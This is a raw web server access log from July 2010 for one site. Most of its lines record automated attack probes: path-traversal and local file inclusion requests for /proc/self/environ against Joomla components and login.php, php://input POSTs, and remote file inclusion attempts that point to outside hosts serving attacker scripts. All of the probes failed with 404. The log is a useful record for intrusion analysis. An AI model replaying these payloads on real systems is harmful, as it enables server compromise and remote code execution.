194.158.206.224 - - [31/Jul/2010:10:17:28 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:17:48 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:17:48 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:22 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:23 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:23 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:47 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:48 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:48 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:49 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:52 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:52 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:52 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:18:53 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:18:59 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:19:35 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:19:47 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:19:50 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:19:51 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:20:06 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:20:06 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:21:17 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:21:21 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:21:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:10:21:22 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:22:43 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:22:43 -0700] "GET /logs/access_100608.log%20%20//admin/business_inc/saveserver.php?thisdir=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:22:44 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:23:10 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:44 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:44 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:47 -0700] "GET /logs/access_100429.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:55 -0700] "GET /logs/access_100429.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:55 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:23:55 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:40 -0700] "GET /logs/access.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:40 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:41 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:52 -0700] "GET /logs/access.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:52 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:26:56 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
74.52.48.66 - - [31/Jul/2010:10:27:08 -0700] "GET /logs/access_100429.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:28:04 -0700] "GET /logs/access_100601.log%20%20//admin/business_inc/saveserver.php?thisdir=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:29:45 -0700] "GET /logs/access.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:29:46 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:29:49 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:10:32:59 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:10:32:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:10:33:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:34:56 -0700] "GET /logs/access.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:34:56 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:35:00 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
202.117.35.252 - - [31/Jul/2010:10:35:22 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:04 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:05 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:06 -0700] "GET /logs//login.php?dir=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:07 -0700] "POST /logs//login.php?dir=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:07 -0700] "GET /login.php?dir=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:08 -0700] "GET /login.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:08 -0700] "GET /login.php?dir=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
187.45.193.159 - - [31/Jul/2010:10:36:09 -0700] "POST /login.php?dir=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.hellionindustries.com"
202.117.35.252 - - [31/Jul/2010:10:38:23 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.117.35.252 - - [31/Jul/2010:10:38:24 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.117.35.252 - - [31/Jul/2010:10:38:24 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:39:00 -0700] "GET /logs/access_100615.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:39:09 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
86.109.96.188 - - [31/Jul/2010:10:39:12 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:43:05 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:43:05 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:43:45 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:43:48 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:43 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:43 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:43 -0700] "GET /logs//login.php?dir=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:44 -0700] "POST /logs//login.php?dir=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:47 -0700] "GET /login.php?dir=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:47 -0700] "GET /login.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:48 -0700] "GET /login.php?dir=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.57.234.23 - - [31/Jul/2010:10:44:48 -0700] "POST /login.php?dir=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:45:16 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
208.43.99.195 - - [31/Jul/2010:10:45:16 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.hellionindustries.com"
38.107.191.90 - - [31/Jul/2010:10:49:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.91 - - [31/Jul/2010:10:49:54 -0700] "GET /logs/access_100311.log HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.92 - - [31/Jul/2010:10:49:59 -0700] "GET /logs/ HTTP/1.1" 200 1653 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.93 - - [31/Jul/2010:10:50:04 -0700] "GET /logs/access_100307.log HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.94 - - [31/Jul/2010:10:50:08 -0700] "GET /logs/access_100309.log HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.90 - - [31/Jul/2010:10:50:13 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1310720 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.91 - - [31/Jul/2010:10:50:16 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.92 - - [31/Jul/2010:10:50:20 -0700] "GET /logs/access_100310.log HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.93 - - [31/Jul/2010:10:50:24 -0700] "GET /logs/access_100308.log HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"
38.107.191.94 - - [31/Jul/2010:10:50:28 -0700] "GET / HTTP/1.1" 200 779 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.hellionindustries.com"